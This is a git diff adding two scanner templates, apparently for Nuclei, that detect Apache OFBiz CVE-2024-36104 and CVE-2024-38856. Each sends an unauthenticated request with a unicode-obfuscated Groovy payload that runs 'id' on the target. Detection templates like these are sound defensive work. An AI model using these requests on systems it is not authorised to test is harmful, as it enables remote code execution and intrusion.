diff --git a/http/cves/2024/CVE-2024-36104.yaml b/http/cves/2024/CVE-2024-36104.yaml new file mode 100644 index 0000000000..dfef206228 --- /dev/null +++ b/http/cves/2024/CVE-2024-36104.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-36104 + +info: + name: Apache OFBiz - Path Traversal + author: Co5mos + severity: critical + description: | + Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue. + reference: + - http://www.openwall.com/lists/oss-security/2024/06/03/1 + - https://issues.apache.org/jira/browse/OFBIZ-13092 + - https://lists.apache.org/thread/sv0xr8b1j7mmh5p37yldy9vmnzbodz2o + - https://ofbiz.apache.org/download.html + - https://ofbiz.apache.org/security.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-36104 + cwe-id: CWE-22 + epss-score: 0.00045 + epss-percentile: 0.16306 + metadata: + verified: true + max-request: 1 + fofa-query: app="Apache_OFBiz" + tags: cve,cve2024,apache,obiz,lfi + +http: + - raw: + - | + POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: word + part: body + words: + - 'java.lang.Exception' + + - type: status + status: + - 200 diff --git a/http/cves/2024/CVE-2024-38856.yaml b/http/cves/2024/CVE-2024-38856.yaml new file mode 100644 index 0000000000..cd94901283 --- /dev/null +++ b/http/cves/2024/CVE-2024-38856.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-38856 + +info: + name: Apache OFBiz - Remote Code Execution + author: Co5mos + severity: critical + description: | + Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). + reference: + - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/ + - https://issues.apache.org/jira/browse/OFBIZ-13128 + - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w + - https://ofbiz.apache.org/download.html + - https://ofbiz.apache.org/security.html + classification: + epss-score: 0.00045 + epss-percentile: 0.16306 + metadata: + verified: true + max-request: 1 + fofa-query: app="Apache_OFBiz" + tags: cve,cve2024,ofbiz,apache,rce + +http: + - raw: + - | + POST /webtools/control/main/ProgramExport HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: word + part: body + words: + - 'java.lang.Exception' + + - type: status + status: + - 200